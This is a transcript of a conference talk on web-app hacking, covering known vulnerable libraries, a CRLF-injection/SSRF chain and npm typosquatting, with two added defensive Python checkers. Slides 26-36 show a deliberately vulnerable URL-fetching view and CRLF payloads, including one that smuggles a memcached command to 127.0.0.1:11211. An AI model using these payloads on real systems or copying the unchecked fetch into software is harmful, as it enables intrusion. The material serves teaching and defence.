
How to hack an Angular app? - ngConf 2018


Asim Hussain

April 18, 2018

Transcript

  1. How to hack an Angular app? @jawache ngConf 2018

  2. How to hack a web app? @jawache ngConf 2018

  3. Real Life Hacking Stories @jawache ngConf 2018

  4. Asim Hussain @jawache codecraft.tv microsoft.com

  5. (no transcribed text)
  6. Vulnerability vs. Exploit

  7. @jawache #1

  8. @jawache Photo by Kristina Flour on Unsplash 0 Day Exploit

  9. @jawache Photo by Veri Ivanova on Unsplash 0 Day Exploit

  10. (no transcribed text)
  11. @jawache

  12. @jawache

  13. @jawache

  14. @jawache

  15. "12 of top 50 data breaches were through known vulnerabilities" - snyk.io
      https://snyk.io/blog/owasp-top-10-breaches/ @jawache

  16. "77% of 433,000 Sites Use Vulnerable JavaScript Libraries" - snyk.io
      https://snyk.io/blog/77-percent-of-sites-still-vulnerable/ @jawache

  17. (no transcribed text)
  18. @jawache

  19. @jawache nsp

  20. @jawache Photo by energepic.com from Pexels Summary

  21. #2 @orange_8361

  22. (no transcribed text)
  23. git push @jawache http://example.com

  24. @jawache git push http://0

  25. @jawache git push http://0:8000/composer/send_email

  26. The send_email view as shown on the slide (imports and comments added here; the slide shows only the function body):

      # Python 2 module names, as in the httplib CVE the deck cites;
      # Python 3 equivalents are urllib.parse and http.client
      from urlparse import urlsplit
      from httplib import HTTPConnection

      def send_email(request):
          try:
              recipients = request.GET['to'].split(',')
              url = request.GET['url']          # attacker-controlled URL
              # urlsplit keeps any raw CR/LF from the query parameter in `path`
              proto, server, path, query, frag = urlsplit(url)
              if query:
                  path += '?' + query
              conn = HTTPConnection(server)
              conn.request('GET', path)         # unchecked path goes into the request line
              resp = conn.getresponse()
              ...
      @jawache
  27. http://0:8000/composer/send_email?to=orange@nogg&url=http://127.0.0.1:12345/foo @jawache

  28. (the same send_email code as slide 26, shown again) @jawache
  29. \r\n @jawache

  30. %0D%0A @jawache

  31. http://127.0.0.1:12345/%0D%0Ahello%0D%0AFoo: @jawache

  32. GET /%0D%0Ahello%0D%0AFoo: HTTP/1.1
      Host: 127.0.0.1:12345
      Accept-Encoding: identity
      @jawache

  33. GET /%0D%0Ahello%0D%0AFoo: HTTP/1.1\r\n
      Host: 127.0.0.1:12345\r\n
      Accept-Encoding: identity\r\n
      \r\n
      \r\n
      @jawache

  34. @jawache
      GET /\r\n
      hello\r\n
      Foo: HTTP/1.1\r\n
      Host: 127.0.0.1:12345\r\n
      Accept-Encoding: identity\r\n
      \r\n
      \r\n
  35. ...:11211/%0D%0Aset%20key%200%20900%204%20data%0D%0A @jawache

  36. GET /
      set key 0 900 4 data
       HTTP/1.1
      Host: 127.0.0.1:11211
      Accept-Encoding: identity
      @jawache
  37. code code @jawache

  38. code code @jawache

  39. @jawache Photo by Kelly Sikkema on Unsplash Summary

  40. #3 @jawache

  41. @jawache

  42. @jawache

  43. (no transcribed text)
  44. @jawache

  45. cross-env vs. crossenv @jawache

  46. @jawache Photo by Jairo Alzate on Unsplash Summary

  47. @scope/package-name @jawache

  48. package-name packagename package.name @jawache

  49. Update Small vulnerability Don't trust anyone All the things Fix

    @jawache
  50. Asim Hussain @jawache codecraft.tv microsoft.com

  51. #1 How I Chained 4 vulnerabilities on GitHub Enterprise - Orange Tsai
      http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
      CRLF injection vulnerability in the HTTPConnection
      https://www.cvedetails.com/cve/CVE-2016-5699/

  52. #2 Exploit DB https://www.exploit-db.com/
      Metasploit https://www.metasploit.com/
      Azure App Services https://aka.ms/azure-app-service-docs
      Google App Engine https://cloud.google.com/appengine/
      Heroku https://heroku.com
      Amazon Elastic Beanstalk http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html
      The Equifax hack and how to protect your family — all explained in 5 minutes
      https://medium.freecodecamp.org/the-equifax-hack-and-how-to-protect-your-family-all-explained-in-5-minutes-a2b5187cb6c0

  53. #3 Oscar Bolmsten on Twitter https://twitter.com/o_cee/status/892306836199800836
      Malicious packages in npm. Here's what to do - Ivan Akulov
      https://iamakulov.com/notes/npm-malicious-packages/
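Slides 26 to 36 show the defect behind section #1 of the references: a user-supplied `url` is split with urlsplit and its path handed unchecked to HTTPConnection, so a CR/LF that arrives in the query parameter ends up splitting the outgoing request (or, aimed at port 11211, becomes a memcached command). The validator below is an added example, written for this transcript in Python 3; it is not the speaker's code nor code from the application the talk refers to. The host allowlist, the permitted ports and the host names used in it are constructed assumptions. It returns the exact request target a safe version of that view would pass to HTTPConnection, and it refuses everything the slides' payloads rely on.

```python
from urllib.parse import urlsplit, unquote

# Constructed allowlist for the example; a real service would load the hosts
# it is permitted to fetch from out of configuration.
ALLOWED_HOSTS = {"render.internal.example"}
ALLOWED_PORTS = {80, 8080}


class UnsafeUrl(ValueError):
    """Raised when a user-supplied URL fails one of the checks below."""


def _has_control_chars(s):
    # CR (0x0d) and LF (0x0a) are the characters that split an HTTP request
    # or terminate a memcached command; the other C0 controls and DEL are
    # refused as well since no legitimate URL needs them.
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in s)


def validate_fetch_url(url):
    """Return (host, port, request_target) for a URL that passes every
    check, or raise UnsafeUrl.

    request_target is what a hardened send_email would hand to
    HTTPConnection.request instead of the unchecked `path` from the slides.
    """
    if not isinstance(url, str) or not url:
        raise UnsafeUrl("empty URL")

    # 1. Check the raw string first. A web framework has already decoded
    #    %0D%0A from the query string by the time the view sees it, and newer
    #    urlsplit versions silently strip CR/LF, which would hide the issue.
    if _has_control_chars(url):
        raise UnsafeUrl("control character in URL")

    # 2. Conservative extra step: refuse percent-encoded control characters
    #    too, so the URL cannot become an injection if something downstream
    #    decodes it once more.
    if _has_control_chars(unquote(url)):
        raise UnsafeUrl("percent-encoded control character in URL")

    parts = urlsplit(url)
    if parts.scheme != "http":
        raise UnsafeUrl("scheme not allowed: %r" % parts.scheme)
    if parts.username is not None or parts.password is not None:
        raise UnsafeUrl("userinfo in URL is not allowed")

    host = parts.hostname  # lower-cased by urlsplit; None if absent
    if host is None or host not in ALLOWED_HOSTS:
        raise UnsafeUrl("host not allowed: %r" % host)

    try:
        port = parts.port  # raises ValueError for a non-numeric or out-of-range port
    except ValueError:
        raise UnsafeUrl("malformed port")
    if port is None:
        port = 80
    if port not in ALLOWED_PORTS:
        raise UnsafeUrl("port not allowed: %d" % port)

    path = parts.path or "/"
    if not path.startswith("/"):
        raise UnsafeUrl("request target must be an absolute path")
    target = path + ("?" + parts.query if parts.query else "")
    return host, port, target


def is_safe_fetch_url(url):
    """Boolean convenience wrapper around validate_fetch_url."""
    try:
        validate_fetch_url(url)
        return True
    except UnsafeUrl:
        return False


if __name__ == "__main__":
    # The two payload shapes from the slides plus one URL the service is meant to fetch.
    for candidate in (
        "http://render.internal.example:8080/compose?x=1",
        "http://127.0.0.1:12345/\r\nhello\r\nFoo:",
        "http://127.0.0.1:11211/%0D%0Aset%20key%200%20900%204%20data%0D%0A",
    ):
        try:
            print("allowed:", validate_fetch_url(candidate))
        except UnsafeUrl as exc:
            print("refused:", repr(candidate), "->", exc)
```

The order of checks matters: the control-character test runs on the raw string before urlsplit, because urlsplit in recent Python releases strips CR, LF and tab, which would make the later checks pass on a URL that has already been tampered with. The allowlist also closes the SSRF side of the chain (reaching 127.0.0.1:11211 at all), independently of the CRLF check.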
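Slides 45 to 48 and reference #3 are about look-alike package names: cross-env vs. crossenv, and the package-name / packagename / package.name variants that a typo or a copy-paste can turn into a different package. As an added example that is not from the talk or from any project it mentions, the check below reads a package.json and flags dependencies that are not exact matches of an allowlist but collapse to the same name once punctuation and case are ignored, or sit within one edit of a listed name. The allowlist and the sample package.json are constructed for the example.

```python
import json

# Constructed allowlist of package names this project is expected to use;
# a real check would take it from a reviewed lockfile or an internal registry.
KNOWN_PACKAGES = {"@angular/core", "babel-cli", "cross-env", "lodash"}

# Constructed package.json containing two look-alikes among real dependencies.
SAMPLE_PACKAGE_JSON = """{
  "name": "demo-app",
  "dependencies": {
    "@angular/core": "^5.2.0",
    "lodash": "^4.17.5",
    "crossenv": "^5.1.4"
  },
  "devDependencies": {
    "cross-env": "^5.1.4",
    "loadash": "^1.0.0",
    "express": "^4.16.3"
  }
}"""


def normalize_name(name):
    """Collapse the variants from slide 48 (package-name, packagename,
    package.name) plus case so they compare equal; an @scope prefix is kept."""
    scope, _, base = name.rpartition("/")
    base = base.lower()
    for ch in "-._":
        base = base.replace(ch, "")
    return scope + "/" + base if scope else base


def levenshtein(a, b):
    """Edit distance (insert, delete, substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def suspicious_dependencies(package_json_text, known=KNOWN_PACKAGES, max_distance=1):
    """Return [(dependency, look-alike, reason)] for every dependency that is
    not in `known` but normalizes to a known name or is within `max_distance`
    edits of one. Exact matches of known names are never reported."""
    data = json.loads(package_json_text)
    deps = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update(data.get(section, {}))

    by_normalized = {normalize_name(k): k for k in known}
    findings = []
    for dep in deps:
        if dep in known:
            continue
        lookalike = by_normalized.get(normalize_name(dep))
        if lookalike is not None:
            findings.append((dep, lookalike, "punctuation or case variant"))
            continue
        for k in sorted(known):  # sorted so the first hit is deterministic
            d = levenshtein(dep, k)
            if d <= max_distance:
                findings.append((dep, k, "edit distance %d" % d))
                break
    return findings


if __name__ == "__main__":
    for dep, lookalike, reason in suspicious_dependencies(SAMPLE_PACKAGE_JSON):
        print("%-10s looks like %-14s (%s)" % (dep, lookalike, reason))
```

A finding is a prompt to look at the package, not proof of malice; the value of the check is that it fires at review time, before `npm install` runs the package's install scripts.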